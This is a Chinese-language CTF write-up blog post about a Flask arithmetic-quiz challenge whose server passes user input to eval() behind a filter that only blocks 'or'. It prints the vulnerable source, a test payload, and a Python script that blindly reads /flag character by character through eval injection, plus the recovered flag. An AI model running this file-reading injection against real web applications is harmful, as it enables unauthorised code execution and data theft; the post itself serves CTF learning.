【web】-flask-简单的计算题（不简单）

少多慢快

已于 2024-07-20 17:15:49 修改

阅读量754

点赞数 19

分类专栏： ctf 文章标签： flask python 计算

于 2024-07-20 17:11:38 首次发布

本文链接：https://blog.youkuaiyun.com/mails2008/article/details/140574013

版权

ctf 专栏收录该内容

42 篇文章

订阅专栏

打开页面是这样的

初步思路，打开F12，查看头，都发现了这个表达式的base64加密字符串。编写脚本提交答案，发现不对；

无奈点开source发现源代码，是flask,初始化表达式，获取提交的表达式，赋值新的表达式，没发现有什么问题，但是eval是个危险函数，前后端没有严格的过滤，这个可以利用,输入：(-497559)+(969608)+(-255632)+(587860)+(716596) and 1==1 后提示Congratulations。source代码和实现代码如下


#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from flask import Flask, render_template, request,session
from config import create
import os

app = Flask(__name__)
app.config['SECRET_KEY'] = os.urandom(24)

## flag is in /flag try to get it

@app.route('/', methods=['GET', 'POST'])
def index():

    def filter(string):
        if "or" in string:
            return "hack"
        return string

    if request.method == 'POST':
        input = request.form['input']
        create_question = create()
        input_question = session.get('question')
        session['question'] = create_question
        if input_question==None:
            return render_template('index.html', answer="Invalid session please try again!", question=create_question)
        if filter(input)=="hack":
            return render_template('index.html', answer="hack", question=create_question)
        try:
            calc_result = str((eval(input_question + "=" + str(input))))
            if calc_result == 'True':
                result = "Congratulations"
            elif calc_result == 'False':
                result = "Error"
            else:
                result = "Invalid"
        except:
            result = "Invalid"
        return render_template('index.html', answer=result,question=create_question)

    if request.method == 'GET':
        create_question = create()
        session['question'] = create_question
        return render_template('index.html',question=create_question)

@app.route('/source')
def source():
        return open("app.py", "r").read()

if __name__ == '__main__':
    app.run(host="0.0.0.0", debug=False)

import requests
import re

def main():
    alphabet = ['{','}', '@', '_',',','a','b','c','d','e','f','j','h','i','g','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','G','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','0','1','2','3','4','5','6','7','8','9']
    url='ip'
    data={"input":""}
    s = requests.Session()
    flag = ''
    for i in range(0,100):
        for char in alphabet:
            try:
                r = s.get(url)
                question = re.search(r"<h4>(.*)</h4>", r.text.decode(), re.M|re.I).group().replace("<h4>", "").replace("</h4>","")[:-1]
                data["input"] = "{0} and '{2}'==(open('/flag','r').read()[{1}])".format(question, i, char)
                r = s.post(url, data=data)
                result = r.content.decode()
                if r"Congratulations" in result:
                    flag += char
                    print(flag)
                    break
            except Exception as e:
                print("Exception: ", end='')
                print(e)
if __name__ == '__main__':
    main()

运行后得到flag : DASCTF{53a6ee70a3e8c013e2b1dbb2b926d3b2}